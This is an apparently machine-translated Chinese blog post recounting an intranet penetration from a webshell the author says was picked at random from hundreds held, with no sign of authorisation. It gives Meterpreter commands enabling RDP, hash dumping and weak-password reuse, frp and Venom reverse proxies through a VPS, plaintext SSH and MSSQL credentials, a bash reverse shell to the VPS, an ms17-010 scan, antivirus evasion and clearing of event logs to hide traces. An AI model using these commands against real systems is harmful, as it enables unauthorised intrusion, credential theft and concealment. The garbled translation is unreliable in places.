当前位置:网站首页>Actual combat | multiple intranet penetration through Viper

Actual combat | multiple intranet penetration through Viper

2022-06-23 04:58:00 ECHO::

​ actual combat | Write down a loan Viper Multiple intranet penetration

immediately hw, These two days of idle famine , Do some practical work , --2022/6/21 19:05 ECHO::

Last time, we made a lot of attacks to prevent leakage web End 、 quite a lot ssh This and the content forwarded by the port ,, It's a big gap , Hundreds of them from me shell Pick a site at random , Start an intranet penetration . How did you get it shell, ad locum ,

https://blog.csdn.net/qq_29437513/article/details/122283851

0x01.Viper go online

​ viper Update to 1.5.22 了 , adopt Callback The callback function generates a kill free exe, Download local , Upload to the target machine

1

The ice scorpion performs

2

The target environment has 360, but viper It's still online

3

The old topic : How to bypass 360? How did you get online ?

  1. some 60, It's very difficult to execute orders , Various white list interceptions , At the same time, the window pops up , The most common net user,

Execute return reject , This situation 360 All functions are fully opened

4

2. The second case ,360 Not fully open , such as , The user has not logged in for a long time , lock , Not all of them 5-1

0x02. Grab Hash

After the launch , Grab hash,viper Bring with you hashdump, But the process is needed x64, The default online process x86, Process migration ,, Select high permission conhost.exe 2345explor These processes ,( Try not to select the system process at the top , Injection is easy to restart )

5-2

Catch hash, Take it to decrypt ,Aa123456, Weak passwords are often used in this intranet ,mssql and rdp,ssh Commonly used (root admin123)

5-3

msf modular , Registry open 3389 post/windows/manage/enable_rdp

reg setval -k 'HKLM\System\CurrentControlSet\Control\Terminal Server' -v 'fDenyTSConnections' -d "1"
execute -H -f cmd.exe -a "/c sc config termservice start= disabled"
execute -H -f cmd.exe -a "/c sc stop termservice"
execute -H -f cmd.exe -a "/c 'netsh firewall set service type = remotedesktop mode = enable'"

Port value of the registry

 key 1

netstat It is found that it has been listening , But the port scan did not find that the port is turned on , Come to the conclusion , This is an intranet machine , By mapping to exits ip On ,

6-4

0x03. Port forwarding

The Internet machine , Although there are webshell, But he is mapped to the exit ip On , Cannot forward proxy .

Can reverse proxy , The machine can access the Internet vps The port of , Turn the traffic to vps On port , stay vps Open a port for forwarding , Local pc Machine for intranet access .

What I have used here are frp and Venom

01.frp Agent for , What is commonly used is vps Listening port , Internet cafes 3389 Traffic forwarding to vps

02.Venom Agent for , and frp almost , Usually can cooperate with proxifer Traffic agents , Local Pc The client accesses the intranet application .

Local testing frp

​ The server only needs to configure bind_port , here vps To configure 22222,

7

​ webshell Terminal frpc.ini To configure , Forward traffic to vps Of 22222, Allow Internet access vps Of 6000 Port access 3389 service

7-1

Forward success ,

8

Log in with the decrypted administrator password

8-1

View the event manager , Clear the event , It's obvious that someone has been repeating fuzz The login password , Login at the same time without rdp Log in successfully through other methods, such as webshell Some will also record , process services.exe tomcat.exewebshell Sign in

Found to have teamviewer

9

0x04. Intranet horizontal

The internal network has a horizontal domain to play domain control , No domain is connected to other devices in the intranet , See how many servers you can get , The purpose of this test is the intranet server , Intranet network equipment , camera 、 Safety equipment 、 The database is not taken into account

Judgment domain , No domain exists

	net time /domain	   Time synchronization of domain control 

	net config workstation  View the role of the host in the intranet 

Horizontal I use port forwarding Venom, this tm It's the artifact , A steady group of .

Intranet asset scanning I use

https://github.com/1n7erface/RequestTemplate

scanning b Very complete ,, common ssh、redis and web scanning ,xray The kernel of , Hang up rdp Inside

some ssh

ssh 10.10.11.113 22 root admin123
ssh 10.10.11.110 22 root admin123
ssh 10.10.11.114 22 root admin123
10.10.30.83 1433 sa Aa123456

Venom Intranet penetration

1.webshell Carry out orders agent.exe rhost rport

11-1

2.vps End monitoring 1009,goto 1 To operate ,socks Agent out of the local PC adopt proxifer Proxy connection

11-2

Local PC adopt Proxifer Set up socks agent

12

Set proxy rules

 agent 2

Local PC-xshell Connecting to the intranet ssh,

14

Login successful , see history, There are obvious traces of development , There is no subsequent infiltration

a

nc rebound shell To vps, nudges ,

nc -lvp 6000
bash -i >& /dev/tcp/vpsip/6000 0>&1

Rebound success , Get shell

15

Only this and nothing more ,, Clean up the traces before leaving ,msf Batch scan ms17-010 Pick up a leak

msf Add route ,

msf

There is a leak , But no subsequent infiltration

 Same as segment

原网站

版权声明
本文为[ECHO::]所创,转载请带上原文链接,感谢
https://yzsam.com/2022/174/202206230109067443.html